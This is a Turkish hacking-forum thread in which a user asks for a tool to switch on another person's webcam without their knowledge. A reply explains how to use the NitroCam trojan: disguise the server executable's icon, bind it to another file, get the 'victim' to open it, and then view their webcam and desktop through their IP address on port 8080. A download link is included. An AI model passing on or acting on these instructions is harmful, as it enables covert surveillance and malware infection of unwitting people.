Karşıdakinin Camerasını Açma..
-
BaBaCaNLaR karşıdakinin haberi olmadan camerasını açabilen bi prog vardı, kaybettim acele lazım...
-
NitroCam, serverı açtırdıgınız bir bilgisayarın
Web Kamerasınından görüntü almanıza veya
Ekran görüntüsünü almanıza yarar
KULLANIMINA GELİNCE
nitrocam_server.exe dosyasını, istersenin herhangi
bir icon degistirici ile iconunu degistirip, isterseniz
NiklaJoiner kullanarak bir dosya ile birleştirip hedef
bilgisayara açtırın.
Kişi dosyayı açtıktan sonra; WebBrowserınızı açıp;
(IE, Netscape, FireFox Vs.)
web kamerasını izlemek için :
http://kişinin_ip_adresi:8080/webcam
Desktop görüntüsünü izlemek için :
http://kişinin_ip_adresi:8080/desktop
Yazıp, istediginiz aralıklarda refresh yapıp görüntü
alabilirsiniz
Ke4ndi makinenizde test etmek için
Serverı Açın, Ve browserınıza;
http://127.0.0.1:8080/webcam
http://127.0.0.1:8080/desktop
Yazıp Görüntü alabilirsiniz
Temizlemek için Fix_Remover.exe dosyasını açmanız yeterlidir
Nitrocam ı
http://rapidshare.de/files/1519313/nitrocam.zip.html
linnkinden download edebilirsiniz
indirdiğiniz zip'in içindeki msn.exe dosyasını kurbana gönder oda açsın! sonra da yukarıdaki gibi adamın ip numarası üzerinden ekran görüntüsü ve web kamerasını izleyebiliyorsunuz
ben denemedim çalıntı yaptım forumdan :) selametle -
Nitro-cam den bahsediyor olma...Madem kaybettin isminide biliyorsundur programın,söyle
-
O mesaj alıntı zaten sadece alıntı yazmadım, çünkü alıntı tahribattan alıntı deil, xxxyyz.com'dan alıntı, paranoyaq mısın baba ayrıca tahribatın forumunda da bu konu daha önceleri açılmıştı, bi rica aldım ilettimm ama tepkini destekliyorum forumun kalitesine firewall durumundasın
Özür dileriz
SaYGıLaR mina kyimm.. -
Trojan Var a.q
Toplam Hit: 20480 Toplam Mesaj: 5
